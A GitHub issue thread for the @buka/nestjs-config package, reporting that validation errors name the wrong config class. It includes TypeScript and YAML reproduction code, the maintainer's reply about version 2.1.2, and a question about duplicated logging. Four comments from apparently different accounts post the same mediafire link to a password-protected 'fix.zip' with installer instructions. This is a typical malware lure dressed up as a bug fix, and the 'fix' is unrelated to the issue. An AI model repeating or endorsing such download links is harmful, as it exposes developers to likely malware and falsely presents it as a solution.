### ISSUE TITLE
Bug: Incorrect error message when a value not pass the validation

### ISSUE THREAD

**Issue by rlarac** [buka-inc/npm.nestjs-config#19]
**Describe the bug**
When a config has an incorrect value the log shows a fixed message: "An instance of **LoggerConfig** has failed the validation", where is no LoggerConfig provided.

**To Reproduce**
Assuming there is a `SomeConfigProvider` as:

```typescript
// some-configuration-provider.ts
import { Configuration } from '@buka/nestjs-config';
import { IsNumber, IsOptional, IsString } from 'class-validator';

@Configuration()
export class SomeConfigProvider {
  @IsNumber()
  intValue: number = 1111;
}
```

With a `some-config-file.yaml`:

```yaml
intValue: 11error
```

With the configuration:
```typescript
// yaml-config-loader.ts
import { existsSync } from 'node:fs';
import { readFile } from 'node:fs/promises';
import { ConfigLoader, ConfigModuleOptions } from '@buka/nestjs-config';
import { parse } from 'yaml';

export async function yamlConfigLoader(filepath: string): Promise<ConfigLoader> {
    return async (options: ConfigModuleOptions) => {
        if (!existsSync(filepath)) {
            if (!options.suppressWarnings) {
                console.log(`yaml file not found: ${filepath}`);
            }
            return {};
        }
        const content = await readFile(filepath, 'utf8');
        return await parse(content);
    };
}
```

```typescript
// app.module.ts
import path from 'node:path';
import { Module } from '@nestjs/common';
import { AppController } from './app.controller';
import { AppService } from './app.service';
import { yamlConfigLoader } from './yaml-config-loader';
import { ConfigModule } from '@buka/nestjs-config';
import { SomeConfigProvider } from './some-config-provider';

@Module({
    imports: [
        ConfigModule.register({
            isGlobal: true,
            providers: [SomeConfigProvider],
            loaders: [await yamlConfigLoader(path.join(__dirname, 'config', 'some-config-file.yaml'))],
        }),
    ],
    controllers: [AppController],
    providers: [AppService],
})
export class AppModule {}
```

When the app is initialized, it shows a message:
```shell
[Nest] 08/26/2024, 4:06:13 AM   ERROR An instance of LoggerConfig has failed the validation:
- Property: `intValue`
  Value: "11error"
  Constraint: isNumber
  Expect: intValue must be a number conforming to the specified constraints

[Nest] 08/26/2024, 4:06:13 AM   ERROR [ExceptionHandler] An instance of LoggerConfig has failed the validation:
- Property: `intValue`
  Value: "11error"
  Constraint: isNumber
  Expect: intValue must be a number conforming to the specified constraints

Error: An instance of LoggerConfig has failed the validation:
  - Property: `port`
    Value: "11error"
    Constraint: isNumber
    Expect: intValue must be a number conforming to the specified constraints
````

**Expected behavior**
It is expected to show the current provider's name passed as an argument of the providers' array when the ConfigModule was configured.

```shell
08/26/2024, 4:06:13 AM   ERROR An instance of SomeConfigProvider has failed the validation:
Property: `intValue`
Value: "11error"
Constraint: isNumber
Expect: someNumberValue must be a number conforming to the specified constraints
````
The message should display the provider's name (in other words, instead of `LoggerConfig` is expected to show `SomeConfigProvider` where the actual incorrect `value` is configured).

**Platform:**
- Ubuntu 22.04 over WSL2 (Windows 11)
- NodeJS (v20.16.0)
- NestJS (v10.4.1)
- @buka/nestjs-config (*v2.1.1*)

**Additional context**
It's a relatively minor issue, but given many configuration values or files, the error message should be precise to locate the problem quickly.

PS: _It seems like the error is throwing twice (the message is duplicated, once as an Error and as a message in the stack trace. This could be changed with a configuration of the Nest error/exception handlers, however, the code displayed in this issue is not modified at all - (it was generated by Nest application generator without any customizations)._

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Val-istar-Guo** [comment]
Great advice. Indeed, I neglected when coding. new version(2.1.2) be released

**Comment by Val-istar-Guo** [comment]
The reason for multiple error prompts should be caused by these two lines of code:

https://github.com/buka-lnc/npm.nestjs-config/blob/17e4ad56e5e8f267a843c89f56d5a4e87bffa617/src/config.module.ts#L65-L66

I haven't removed Logger.error yet, because I'm not sure I should.
I am worried that if there are some situations, the log of thrown error will not be visible.
